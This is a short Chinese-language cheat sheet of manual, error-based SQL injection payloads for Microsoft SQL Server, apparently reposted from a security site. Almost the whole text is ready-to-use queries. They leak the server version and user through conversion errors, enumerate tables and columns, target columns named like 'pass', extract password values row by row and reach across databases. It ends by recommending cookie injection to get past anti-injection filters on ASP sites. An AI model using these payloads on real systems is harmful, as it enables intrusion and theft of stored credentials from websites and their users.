Sql Server 手工注入总结（显错模式）

--显错模式总结,利用类型转换报错。

--1=convert(int,(@@version))

--1=convert(int,(select host_name()))

--and 1=convert(int,(user))

--爆表名记录条数。replace(字段名,' ','')

select replace(str(count(*))+'N',' ','') from sysobjects where xtype='U'

--逐条爆表名,www.2cto.com 需要更改是"top 0","top 0"代表第一条数据内容。

select top 1 name from sysobjects where xtype='U' and id not in(select top 0 id from sysobjects where xtype='U')

--利用模糊字段关键词找表名,需要更改是"top 0","top 0"代表第一个表名.

select top 1 name from sysobjects where xtype='U' and id not in(select top 0 id from syscolumns where id in(select id from sysobjects where xtype='U') and name like '%pass%' order by id asc)

--爆表与之对应字段,需要更改的是表名"username"和"top 0","top 0"代表第一条数据内容。

select str(count(*))+'N' from syscolumns where id=(select id from sysobjects where xtype='U' and name='username')

select top 1 name from syscolumns where id=(select id from sysobjects where xtype='U' and name='username') and name not in (select top 0 name from syscolumns where id=(select id from sysobjects where xtype='U' and name='username'))

--爆对应表,对应字段数据库内容.

--爆数据条数

select str(count(*))+'N' from username

--爆对应字段对应内容,需要替换password,username,id,以及"top 0","top 0"代表第一条数据内容。

select top 1 password from username where id not in (select top 0 id from username)

--跨库

select top 1 name from ss.dbo.sysobjects where xtype='U' and id not in(select top 0 id from ss.dbo.sysobjects where xtype='U')原理就是那么简单,在测试的过程中学会变通。对于asp+sql server,

经常会遇到做了防注入,有时候别忘了cookies注入,效果不错。